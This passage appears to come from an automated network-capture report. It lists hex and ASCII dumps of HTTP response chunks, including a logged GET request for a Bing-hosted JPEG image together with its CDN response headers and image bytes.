                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: b8 b4 e5 e9 4d a5 5a 40 2d 3a 90 0e f4 bd 28 28 75 0a 3d 3b 53 41 fc e9 d4 00 53 a9 a3 d6 8a 00 77 5a 29 07 b5 2d 00 14 ab 49 d2 9d 40 07 14 63 14 0f 7a 28 00 c6 68 e9 45 18 34 00 e1 ef 47 22 8c 8a 1b 9e b4 ae 01 45 0b d6 9d 48 06 d2 fb 51 8a 5c 76 a0 04 c7 6a 5a 31 f2 d1 4a e3 48 28 00 d1 9c d1 f5 a7 71 d8 28 eb cd 1d 28 a9 61 60 a3 af 4a 31 9a 30 68 1d 82 97 f8 69 70 28 1c 71 40 c6 e3 d6 94 f3 d2 96 8a 00 28 f6 a2 8a 00 4e b4 b4 51 40 03 74 a1 7a 51 46 33 40 05 14 63 d2 8c e2 80 0a 29 7d 8d 1d 28 01 00 cd 2e 28 c7 ad 2d 00 04 7a d1 8f 5a 4c 52 d0 03 4e 3b 52 fd 69 69 31 8e 45 00 0b 47 51 c5 2d 18 ef 40 09 d0 71 4a bd 28 a2 80 0a 32 28 a3 19 eb 40 03 74 a3 9a 5f 6a 4c 62 8b 94 18 cf 34 98 f5 a5 f7 14 51 a8 09 9a 09 c5 29 14 29 f9 a8 00 eb 45 37 38 e2 97
                                                                                                                                                                                                                                                                            Data Ascii: MZ@-:((u=;SASwZ)-I@cz(hE4G"EHQ\vjZ1JH(q((a`J10hip(q@(NQ@tzQF3@c)}(.(-zZLRN;Rii1EGQ-@qJ(2(@t_jLb4Q))E78
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 04 7e b5 6e cb 54 dd 32 8b 92 51 80 c8 24 93 b8 1e 79 f4 e2 ab 45 72 25 86 da d0 ba ec 68 c6 43 f4 dc 38 c0 f4 cf 5a 75 c5 aa dc a8 30 c8 0c d1 0c ee 65 c7 19 fb b9 07 d6 9c 74 64 d4 6a 51 b1 d0 45 73 60 f6 eb 19 80 f9 2c fb c4 af c9 46 eb 81 df 02 b8 dd 6a d2 6b 4d 4b fb 4e df 0e b3 73 73 1a fd d1 e8 48 23 39 ef 9f 5a b0 b2 dd 45 1c 92 2a c6 41 c8 65 dc 42 e4 74 c7 a7 3e f5 a3 ac 45 6f 3e 8e cf 69 b5 e5 f2 46 f2 07 51 8e 41 07 1c e7 d3 35 d5 1d 6c 79 95 34 b9 86 d7 50 ea 11 b4 76 e4 c6 cd 82 f9 c0 c1 07 a8 fa e3 38 ab 3a 23 ce 61 40 46 e6 f3 1d 64 60 3d 38 fc 3d 6b 33 54 b5 99 ec 21 96 da da 34 fb 39 c1 31 03 bb 20 60 e7 bf 5a b3 e1 5b 99 43 04 94 06 2d b9 89 6c 83 bb 3e a2 b3 ad 74 8d 70 ba c8 e9 2c 6e 0c 77 05 9e 3d a6 30 4c ce b9 19 51 df a7 f2 eb 5b
                                                                                                                                                                                                                                                                            Data Ascii: ~nT2Q$yEr%hC8Zu0etdjQEs`,FjkMKNssH#9ZE*AeBt>Eo>iFQA5ly4Pv8:#a@Fd`=8=k3T!491 `Z[C-l>tp,nw=0LQ[
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: bd 8b 59 1e 3d ee 51 d3 f4 a5 fb 42 cb 2c 46 e5 b2 4b f6 1d 3e e8 1e 99 ef 5a 1a f6 a2 6c ac 63 69 20 00 c2 01 55 5c 1d a0 73 8c 0a 92 f2 44 44 fb 32 64 c8 00 50 f9 fb a0 9c 9f e5 fd 2b 0f c5 cd 08 8f c8 f3 f0 55 41 72 3a 12 72 76 fd 7f 95 0b 57 a9 9c b6 26 d5 a6 87 54 d1 ed 5e 44 75 8d 08 66 5c e0 b0 f4 cf a5 41 68 56 ff 00 52 8b 60 db 1c 28 59 d8 0e 15 46 0e 0f e1 4d 92 e6 72 b0 97 45 8a 11 0e d0 cc 3e 52 a7 3c 81 df fc 29 6c cb cb b2 4b 48 19 56 66 08 40 e8 58 81 93 ee 3f 97 15 44 a6 6b 58 c8 a5 e5 12 ff 00 aa 7c 01 df b7 18 e3 f9 d6 7e bc 52 df 50 5f b1 c0 64 65 42 ac 80 e3 27 38 c9 fa 66 b5 b5 1b 49 34 ed 15 c3 dd c5 81 86 39 1f 37 07 81 c7 3f 8f b5 70 d6 7a d5 ec ba b5 cc b3 a6 e6 32 72 99 c7 19 34 a3 ae a6 8d d9 1a f3 09 ad ec e3 9e 74 28 85 f6 90
                                                                                                                                                                                                                                                                            Data Ascii: Y=QB,FK>Zlci U\sDD2dP+UAr:rvW&T^Duf\AhVR`(YFMrE>R<)lKHVf@X?DkX|~RP_deB'8fI497?pz2r4t(
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 26 19 76 8d 73 b7 9c 16 19 c7 d7 9a 71 22 46 95 9e d3 63 69 34 9c 15 dc dd 7d fb fe 54 b7 57 8e 6f 0c de 5e c0 1b 1b 73 e9 dc 7a 66 9f 04 12 c1 6f 6b 1a 00 d2 aa e5 c1 39 52 48 e3 e8 29 64 42 6d f7 85 5f 30 9f 99 0f 42 3f cf 6a a2 2e 4f 73 63 e7 2c 6a f9 f2 ce 0e 70 54 7b e7 23 a8 ad 4b 4b 8b 6b 6b 75 67 9c 4b f6 74 3e 52 8f e2 cf 40 7e a7 f3 35 89 1e af 2c 30 9b 6b b9 09 61 36 e6 0d d4 00 07 63 d8 56 9f 87 e3 87 53 b6 96 42 ec 7c b2 23 50 a4 64 b3 1e fe df 5a ae 9a 99 ec ca b6 f6 f3 da 9b 8d 43 51 9c db 35 d3 96 52 72 32 a0 76 c7 7c f6 3c 54 36 48 e6 e5 b5 01 28 7d e3 60 c1 dc 7b e3 77 5a f4 3b 5d e2 d3 ca 1c e4 74 71 9f cf b1 ac 0d 7f 4a 68 ae da 6b 04 b6 45 71 89 10 ae d0 7d c6 3b 8f a5 4c 65 76 69 24 72 3a 85 cd c7 d9 1e 09 c9 65 6c ae c9 00 62 0f a8
                                                                                                                                                                                                                                                                            Data Ascii: &vsq"Fci4}TWo^szfok9RH)dBm_0B?j.Osc,jpT{#KKkkugKt>R@~5,0ka6cVSB|#PdZCQ5Rr2v|<T6H(}`{wZ;]tqJhkEq};Levi$r:elb
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 6f ad 2f ef 8c 70 c1 a8 42 16 65 43 f2 ac a0 1c 8f 6c f2 47 d2 b9 a9 de 0d ab 9d b5 ad 3b 34 8b de 0f 2b 36 9b 34 4f 3a 98 a5 73 24 6b 9c 12 ac b8 70 b8 eb d0 1c 7d 6b cf f5 a8 9b 4e d5 a7 30 1c c4 58 f9 4a c0 83 82 49 fd 0e 47 e1 5b 9e 26 be 97 c0 ba 86 9f 65 73 6d 32 2b c4 1d 19 97 69 29 9e 1b df d7 8a 6f 88 f4 c6 7d 42 4b 91 71 ba dd db ed 16 ee 06 46 d7 19 2a d8 ed 93 d7 b5 74 d0 69 4d ca fa 33 8f 12 9c a9 a8 db 58 9c e6 ab a8 63 4b 88 3c 9c 60 2b 00 78 2c 78 e2 b1 2e ad af 2f 12 68 27 1e 6d ac 80 ed 71 9f 95 88 c8 38 fa e3 9a 6f 8a 2f 12 18 63 b7 f2 00 60 02 e0 e4 e3 fd a3 4b 6f e2 0f 2e d5 22 8c ed 03 07 3d f3 8e 87 d8 fa 57 7f 43 cd b3 72 d4 97 e1 fd a3 14 85 27 42 4c 73 95 90 18 cf 4c 00 30 7b e7 f4 ae bb c4 f7 50 a4 66 14 c2 6d 1b 43 72 df f0 2c
                                                                                                                                                                                                                                                                            Data Ascii: o/pBeClG;4+64O:s$kp}kN0XJIG[&esm2+i)o}BKqF*tiM3XcK<`+x,x./h'mq8o/c`Ko."=WCr'BLsL0{PfmCr,
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 90 dc de 32 b4 d7 9e 68 79 1d 8f 24 ee fe 5d ab 2b 49 43 a5 6b 4d 68 8e 65 17 09 bf cd 73 b9 9b 9c 92 4f af 6f 6a d2 11 f7 4c 27 2f 78 a3 7a 90 e9 7a 55 d5 c3 db fe f2 69 be 73 b7 ef 00 01 00 76 c0 f5 f5 26 a6 f8 7f ac b9 b3 98 ea 78 4c fc f1 6e e0 15 c8 00 67 bf 35 6b c5 d6 d3 5e e9 31 41 11 0f 71 24 c3 64 63 96 7c 1e 40 1c 74 15 76 c7 c1 cc f7 50 4d aa f1 02 a0 ff 00 45 8f 8e 9c 73 8e d9 e6 89 1a 47 96 c5 bd 2e de ea 2b 53 7b 00 6d f2 30 67 f9 4b 10 0f 50 06 38 15 af a4 db 5c a3 17 9e 71 3b 33 12 cc 98 00 01 d0 2a 81 8a bc f2 c7 32 15 7d be 5f 00 29 fb bc 63 15 52 f2 e5 a0 fd dc 9f bb 8d 54 b2 ba 81 8e 9d 39 a7 76 cc 9b 4b 56 55 d5 74 db 09 2f 16 77 86 49 1a 39 44 df 2c c7 05 b3 8c b2 8f bd 8a d0 b3 86 c9 59 de d4 ae 66 62 cc 54 9c 93 8e bc f7 c5 57 50
                                                                                                                                                                                                                                                                            Data Ascii: 2hy$]+ICkMhesOojL'/xzzUisv&xLng5k^1Aq$dc|@tvPMEsG.+S{m0gKP8\q;3*2}_)cRT9vKVUt/wI9D,YfbTWP
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16069INData Raw: 31 f6 1e 95 a9 a8 4b e6 46 04 51 33 3f 97 cb 28 3c 1e 9c 1e 9d e9 ba 4c 3b 72 5c 65 b8 e4 83 f4 a7 0f 75 5c ce a5 e4 ec 49 3d c4 56 16 06 51 97 64 52 c1 01 e7 8f ae 2b 9d 81 ee ae ee a3 67 32 b3 3b ee 97 6a 9d a0 e7 3b 49 1c 0f 4f 5e 0d 69 6b 5a 69 b9 bc 57 69 42 a0 f9 b6 67 92 41 e0 7a 55 8d 0a 13 67 09 32 b6 d8 cb 86 f9 8f cb 93 c7 03 ae 7a 53 d9 09 5e 4e dd 0a f7 d6 bb ac 56 49 a7 96 46 3f 7d a5 23 6a 8c 60 00 00 02 b1 ce 95 a7 7f 65 1b 87 9d 63 b7 6c b3 43 e6 79 69 70 cb fc 24 f5 c0 c7 41 5a de 2d d6 6c ad b1 1d d4 52 3c 0c 4e e2 87 18 90 60 aa fe 23 bf 6a e0 3c 41 79 25 e5 cc 4e fb 7c bb 40 76 c4 9c 22 83 fc 23 04 f3 ef d4 9f a5 43 a9 68 9b 53 c3 73 4e fd 0b f3 6a 72 ea f7 16 eb 2c 56 d0 59 d8 e4 9f 2a 32 a8 80 0e 48 e7 38 1c 71 8e 49 ac 3d 7c 6a 77
                                                                                                                                                                                                                                                                            Data Ascii: 1KFQ3?(<L;r\eu\I=VQdR+g2;j;IO^ikZiWiBgAzUg2zS^NVIF?}#j`eclCyip$AZ-lR<N`#j<Ay%N|@v"#ChSsNjr,VY*2H8qI=|jw
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: 36 c2 d9 56 59 33 35 fb 31 67 60 7e 50 a3 3c 28 ec 00 e3 39 e6 ba db 2b 79 2d ed a0 5f b3 37 96 70 ae c0 7c aa b9 fb a7 dc fb 51 b1 0f 56 1a 7a 34 db 4c 8f ff 00 2c c1 e7 be 01 eb fe 79 a2 b6 2d d6 14 d3 e6 9d 6d e3 21 58 80 73 d0 74 c7 19 e9 45 67 cc d9 aa 5a 6a 7c e6 12 e6 fe e9 55 e4 f3 67 b8 72 c5 df 82 cc 7a 92 7d 2b a7 b3 d3 2c 34 8b 34 96 fc 09 2e e4 24 c5 1f 50 00 ea 70 7a 93 e9 d6 af fc 39 d0 92 29 1a e2 e6 3c dd 6d fb a7 91 0a 9e ed ee 7a 75 ae 9e 3d 36 d5 2e 9a e9 d3 74 e3 e5 0c dc b6 07 03 6e 78 03 db bd 77 46 1d 59 c3 5e b7 44 64 78 72 c1 d6 c5 66 b8 27 73 fc c3 72 ed 3c f3 d3 fc e2 b5 75 4d 25 9e c6 35 85 c2 ab 36 24 3c fc aa 06 49 07 d7 8a 96 13 e7 4c 15 87 cc bd 00 ac df 1c eb d0 e8 d6 e9 a6 23 e2 e6 6c 3c a0 67 e5 53 dc 63 f2 c1 a7 3b ad
                                                                                                                                                                                                                                                                            Data Ascii: 6VY351g`~P<(9+y-_7p|QVz4L,y-m!XstEgZj|Ugrz}+,44.$Ppz9)<mzu=6.tnxwFY^Ddxrf'sr<uM%56$<IL#l<gSc;
                                                                                                                                                                                                                                                                            2024-12-27 06:09:20 UTC16384INData Raw: be 2b 9e d6 3c 55 34 7e 27 b5 d3 be fc 92 cc 89 20 88 8d b0 9d d8 c6 7b f1 cf b6 2b a8 31 f9 aa 52 7f f5 72 64 72 30 4f a1 1e 9d 33 4d 68 61 3b 92 ff 00 ac 52 40 20 03 dc 7a 76 a6 c9 08 81 d2 e6 50 19 9d c2 c4 02 96 60 31 93 92 07 18 a8 a6 13 5c 4c 8b 14 82 25 07 24 63 24 a8 3d 07 b9 1e b5 a4 a0 ba 94 27 19 e7 34 6c 28 bb 8f 8e 35 00 ed 3b 80 ef df 34 ae 76 47 b3 6e 0b 1c 67 8a ce d2 2e 8d bd d4 f6 72 ee 04 38 31 b3 72 1b 39 24 03 ed e9 53 6a 57 b0 42 89 2c ee a9 10 70 ae c4 fc aa 4f 4c 9f ca a6 da 96 9a 68 b2 09 17 0a ab ca 9e 72 3a 0e 3b fd 6b 33 55 f0 d5 a5 f4 3e 43 c0 7e 69 0b 1f 9c e0 92 72 4e 7d f1 f8 d1 2e ad 04 77 82 da db f7 f3 2c 7b d9 50 6f 2a b9 c6 4e 3d 7a fd 2b 5e 1b 86 89 53 27 3b f2 7d 3f 0f 5e 28 69 a0 52 57 33 b4 ff 00 0d 69 96 d7 d1 dc
                                                                                                                                                                                                                                                                            Data Ascii: +<U4~' {+1Rrdr0O3Mha;R@ zvP`1\L%$c$='4l(5;4vGng.r81r9$SjWB,pOLhr:;k3U>C~irN}.w,{Po*N=z+^S';}?^(iRW3i


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            8192.168.2.649739150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC346OUTGET /th?id=OADD2.10239381795017_1P2HE79XS2FOA94E1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 977500
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: ECB535836A4B499882E98FE5525ECB27 Ref B: EWR30EDGE1616 Ref C: 2024-12-27T06:09:21Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:20 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1e fc 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 30 3a 34 33 3a 35 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                            Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 10:43:558
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC16384INData Raw: 7f cf 3f bc 95 c7 28 51 72 8d 2f 80 0e 93 16 53 f8 4a 5d 63 48 82 f3 58 b3 d2 fc fb 6b ad 2e ee f7 7b da 6f ff 00 57 73 0f fb 2b ff 00 02 ae 76 4d 2a e6 1b db 59 34 7d 57 ca d3 ff 00 79 1c 5e 54 db e6 b7 ff 00 7f fe fb fb d4 bf 03 f5 0b dd 13 c5 97 51 ea 90 5e c5 71 e5 79 72 c5 2f fc f2 5f 9a 4d fb eb 57 58 8b c3 96 f6 5f da 1a 5f fa 7c 7e 6b c9 77 2c b0 f9 33 5a 3b 7f 04 7e 5f f0 d4 47 9a 95 69 52 dd 77 03 1b 50 f1 1d ee 8f 67 15 bd c4 f3 4b e5 7e ef f7 5f 73 7a ff 00 73 e6 ad 8d 1f 50 d4 74 4f b5 c9 6f 3f fa 45 d4 5f bd 8a 29 be 7f 9b f8 9e 4a e7 a4 b4 b6 d5 7c df 32 79 bc bb a9 7f d5 7f cf 37 fb bf f0 35 ad ef ec 7d 46 e7 45 87 cc 9f ec b7 11 79 91 c5 17 ce ff 00 f0 0d 9f f8 f5 75 ce 84 39 34 f9 81 37 8e 35 0d 7a cf cd d4 34 bb eb df b3 da ef fb 57 f6
                                                                                                                                                                                                                                                                            Data Ascii: ?(Qr/SJ]cHXk.{oWs+vM*Y4}Wy^TQ^qyr/_MWX__|~kw,3Z;~_GiRwPgK~_szsPtOo?E_)J|2y75}FEyu9475z4W
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC16384INData Raw: 00 ed 0b d7 4f 22 26 ff 00 9e 5f f0 2a d7 db 27 87 bc 33 0d 9f 87 3f d2 b5 89 62 f3 25 96 58 76 7c 9f de 7f 9a b8 6d 53 c4 76 57 ff 00 e8 71 d8 c3 14 9f eb 3e cb 69 f7 37 b7 f7 ab 3c 1e 0f 9e 73 74 be 16 13 3a 7f 12 69 ba 75 e4 d6 bf da 13 f9 52 58 7e f2 59 7e 47 86 4d a9 fb bd cf f7 9e ab 48 9a 4d b4 d1 49 ff 00 2e fe 57 fa 2c b2 fe f9 3f e0 4b bb ee ff 00 b5 5c 96 9f 69 1d ce 97 2f f6 7f fc b2 97 fd 2a d7 e7 f3 a3 f9 3e fa d7 4f fd 95 a8 be a9 2f 99 3d 94 b6 77 51 79 72 dd 4b ff 00 4c ff 00 cf cd b2 bb e7 45 d2 f7 39 86 3f c5 09 6d e2 1b 29 63 b7 b1 b2 97 cd 8b ca 8a 5b b8 51 21 b7 dd f7 9b e4 af 0d b7 b7 b2 f0 f7 89 ff 00 e2 61 3d 95 fc 71 79 9f ea a6 fe 3a f4 bd 42 df 55 7f 0c 5d 5c 5b e9 56 52 f9 b2 ff 00 ad bb 9b 64 3f ef c6 9f 2e fa f1 99 13 c9 9e
                                                                                                                                                                                                                                                                            Data Ascii: O"&_*'3?b%Xv|mSvWq>i7<st:iuRX~Y~GMHMI.W,?K\i/*>O/=wQyrKLE9?m)c[Q!a=qy:BU]\[VRd?.
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC16384INData Raw: bc d3 bf dc db f2 fd fd b4 ff 00 b1 5c c3 a5 dd 68 7e 24 f1 1d 94 56 f2 ef 92 58 a2 ff 00 48 7f 97 fe 79 ff 00 0e fa 9a 38 bc 46 fe 54 71 cf 7b f6 3d 53 f7 9f e8 9b 21 ff 00 57 fe df f7 76 d7 9f 08 7f 78 e7 2c f8 82 e3 4d ff 00 8f 3b 8f 3a d6 e2 2d 9f ba 8a 6f df 7f b4 9f fd 8d 4d 67 ae c7 61 0c 5a 5d c5 8f fa 1e 97 e6 79 b2 fc 9f ea bf bc bf f4 d5 ab 8c d3 fc 1f 7b 61 a5 dd 6b 1a 85 8c d1 49 75 fb bb 5f 36 6f f5 7b 9f ef 35 6f 6a 96 bf 69 d1 7e c7 79 7d 0f da 3f 71 e5 5d 7d b7 7c 3b 3f eb 9b d1 5a 8d 1f 53 43 bd d1 af 74 e5 d1 62 d7 f4 78 66 be f1 05 fc bf 62 96 d6 28 52 69 a4 dd fc 4b fd cf f6 5d 6b c9 fe 2a 5b c8 97 df d9 76 fa 54 d1 5c 79 51 f9 b1 5d de f9 cf 23 a7 fc b5 6f ee 33 7f cf 3a ef 7c 27 a6 5b db 6a 56 b1 e9 fa ac d1 5e 58 c5 e5 dd 4b fe a6
                                                                                                                                                                                                                                                                            Data Ascii: \h~$VXHy8FTq{=S!Wvx,M;:-oMgaZ]y{akIu_6o{5oji~y}?q]}|;?ZSCtbxfb(RiK]k*[vT\yQ]#o3:|'[jV^XK
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC16384INData Raw: 26 91 e9 5e 19 8b cb ff 00 4e 92 fe 2f 32 5b 59 7f d4 fc c9 5d df 82 f4 2b 9f b6 c5 6f 79 7d f6 a8 ed 7f 79 6b 6b 69 0b ff 00 12 7f e4 3f f6 aa b6 9f a6 68 b6 da d4 5a 9c 97 d3 7d 9e 29 53 fd 2b ef a4 ff 00 c4 aa cd f2 a2 7f bd fd ea b9 26 b1 6d 67 e2 c9 75 4b 78 35 4b 5b 7f 2b cb 97 cd ff 00 97 89 7e f3 47 be be 7b 15 5a 75 54 b9 37 66 85 1f 17 7c 3e d3 ad 35 ab af 15 ea 7a a4 f6 3a 04 7b 3c d8 a2 f9 ee 24 7f f9 e7 4e b8 48 fc 55 f1 02 2f ec 78 34 cf b4 58 fe f2 d7 4a 97 fd 9f bb e6 6f fe 36 fe ed 56 f8 91 e2 bd 5a db c7 50 de 69 f6 30 cb a5 c5 12 5c c5 6b 2e cf 26 3f e1 de eb ff 00 a0 ee ac 5d 2f c6 7f 61 fb 25 c6 9f e1 6b 38 b5 48 a5 9f ca f2 a0 fd cd c7 9b ff 00 b3 af 6a d2 8d 1c 5c a8 46 53 d6 56 d3 c8 08 7e 2e 69 52 69 8b aa fd 9f 5b 9f ec 96 b7 71
                                                                                                                                                                                                                                                                            Data Ascii: &^N/2[Y]+oy}ykki?hZ})S+&mguKx5K[+~G{ZuT7f|>5z:{<$NHU/x4XJo6VZPi0\k.&?]/a%k8Hj\FSV~.iRi[q
                                                                                                                                                                                                                                                                            2024-12-27 06:09:21 UTC16384INData Raw: fa 65 e4 f3 79 92 ff 00 aa b5 8b fe 5d ff 00 ef aa e3 34 f9 6e 6d af 7c c8 ff 00 75 24 55 bd a1 e9 57 be 24 fb 57 97 3f fa 44 51 79 9e 54 b5 ea d6 84 39 39 67 b1 99 d0 dc 78 ae e7 ed b1 49 67 3c df 67 97 cb 8f cd aa df 11 2f 6d ae 74 5f 2f ed df 6f 92 5f f9 6b e7 7c f5 cc 5c 7f c4 ab cd d3 f5 08 3f d2 22 ff 00 a6 df ea e9 9a 5d ec 9f 63 fb 1f d8 7e d5 ff 00 6c 6b 08 61 69 c3 df 80 0f f0 9d d6 9d 6d ad 45 fd a1 e4 fd 9e 2f f5 be 6d 75 5a c6 b1 a7 5e 4d 2c 76 fa 54 32 fd ab fe 5a ff 00 a9 ae 4b 54 d1 2f 6d a1 fb 45 e5 8c d6 b1 ff 00 d3 5f bf 57 3c 1f 71 72 f6 72 d9 c7 3c 31 47 2c b5 d1 38 42 5e f0 1b 7e 1b bd d2 52 ca 2b 39 34 af 36 e3 cd 93 fe 3e ff 00 e5 df fd da 3f b7 6f 5e 1f 33 ed de 55 bd 87 99 e5 56 54 97 11 c3 aa 45 fe ba 58 fc df f5 54 fb 3d 4f 65
                                                                                                                                                                                                                                                                            Data Ascii: ey]4nm|u$UW$W?DQyT99gxIg<g/mt_/o_k|\?"]c~lkaimE/muZ^M,vT2ZKT/mE_W<qrr<1G,8B^~R+946>?o^3UVTEXT=Oe
                                                                                                                                                                                                                                                                            2024-12-27 06:09:22 UTC16384INData Raw: 1d 4a 47 92 08 2e b5 4f b3 66 59 75 a1 b3 4f ff 00 bf 71 ff 00 7a bc c9 60 d4 5f b5 e6 7c cb b7 ea 04 7a 87 87 ed f4 ad 16 eb 50 d3 2f b4 5b eb 7f b2 ff 00 a5 4b f6 dd 93 47 2a bf dd d9 fd ea c1 d1 fc 7d ab 69 50 df e9 fa 3e a9 a9 c5 67 75 fe aa 2f 3b ee 35 75 de 17 f0 d6 85 a9 7d be ff 00 48 82 f6 5b cb 1f 32 39 6d 74 a8 52 f9 3e e3 fc c9 bf 96 5a cf f1 06 99 e0 7f 0f 68 f6 ba 9e 9f ff 00 13 48 e5 89 24 fe cb d4 37 c3 2c 0e df 7f cc d9 f7 ff 00 e0 2f 5d 70 c4 51 97 ee ea 45 c9 fa 00 fd 53 c5 17 3a 8e a7 15 c7 ef a2 b8 8b 64 9e 6d ae a5 e7 7e eb fb ee 89 fc 5f de ae 4b c7 1e 25 3a ef 88 22 b8 f2 21 8b cb fd dc 52 c5 f7 24 ff 00 a6 95 b1 79 e2 2b 74 f1 05 a7 88 3c 21 3f d9 75 0f f8 f6 fb 05 a4 2f e6 c7 b7 ff 00 43 43 de bb cb 0d 33 51 9a c6 28 fc 4f aa f8
                                                                                                                                                                                                                                                                            Data Ascii: JG.OfYuOqz`_|zP/[KG*}iP>gu/;5u}H[29mtR>ZhH$7,/]pQES:dm~_K%:"!R$y+t<!?u/CC3Q(O
                                                                                                                                                                                                                                                                            2024-12-27 06:09:22 UTC16067INData Raw: 8a 5f dc db fc c9 f3 22 c4 9f bc 45 ae b3 e2 46 8f e2 f4 f1 a4 b2 78 62 7f 2a df fe 3f 62 8b ce 4f de 4b fe ce ef e3 ff 00 79 ab 90 f8 ab ab f8 9f 5e 17 57 9a df 85 a6 b1 92 2b b4 fb 55 ff 00 fe c9 bf f8 eb d4 a7 89 9e 29 47 6e 57 b9 99 eb be 24 d7 fc 32 fa 2d ae b1 27 88 a1 8b ed 51 4f 1c bf d9 f6 4f 0c 37 77 49 e5 ff 00 ba ef fe cd 62 78 83 4f 92 6d 4b 4b d6 2d f5 b9 bc 3b 79 14 4f 73 a5 69 72 fc ff 00 6b da fb be f6 ef 91 bf df f9 9a b2 be 17 cd 73 e3 ef 08 cb e1 bd 4e 09 ae a4 8b 64 96 b7 5e 72 7e e2 5f b8 89 fe d5 64 e8 f7 ba 75 86 b5 2e 97 ae 4f ad 79 7e 54 7f e8 b7 70 ff 00 1f c9 fd df e1 af 1a 38 45 4a 72 5f 69 74 df 42 ca fa a7 8f 75 ab 8d 6b 50 b3 b3 82 f6 d6 e3 fe 7a dd 43 b2 e3 ca 5f 9a 4f 91 17 fc fa d6 94 5a 6d c3 cd a7 f8 83 5c f1 4c 36 36
                                                                                                                                                                                                                                                                            Data Ascii: _"EFxb*?bOKy^W+U)GnW$2-'QOO7wIbxOmKK-;yOsirksNd^r~_du.Oy~Tp8EJr_itBukPzC_OZm\L66
